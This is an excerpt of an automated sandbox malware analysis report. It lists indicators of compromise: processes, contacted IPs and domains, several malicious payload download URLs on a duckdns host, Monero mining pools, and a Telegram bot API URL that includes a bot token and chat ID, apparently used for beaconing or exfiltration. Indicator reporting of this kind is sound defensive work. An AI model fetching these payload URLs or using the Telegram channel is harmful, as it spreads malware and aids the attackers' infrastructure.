65->79         started        81 tasklist.exe 65->81         started        process24 process25 83 conhost.exe 67->83         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.243.33.118
 unknown United States
23470 RELIABLESITEUS false
200.165.100.3
 puredgb.duckdns.org Brazil
7738 TelemarNorteLesteSABR true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
puredgb.duckdns.org 200.165.100.3 true
api.telegram.org 149.154.167.220 true
pool-nyc.supportxmr.com 104.243.43.115 true
pool.supportxmr.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://puredgb.duckdns.org:30000/hyar8z46/discord.exe true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success false
    		high
    http://puredgb.duckdns.org:30000/6nif5f8r/address.exe true
    • 8%, Virustotal, Browse
    • Avira URL Cloud: malware
    		 unknown
    http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe true
    • 8%, Virustotal, Browse
    • Avira URL Cloud: malware
    		 unknown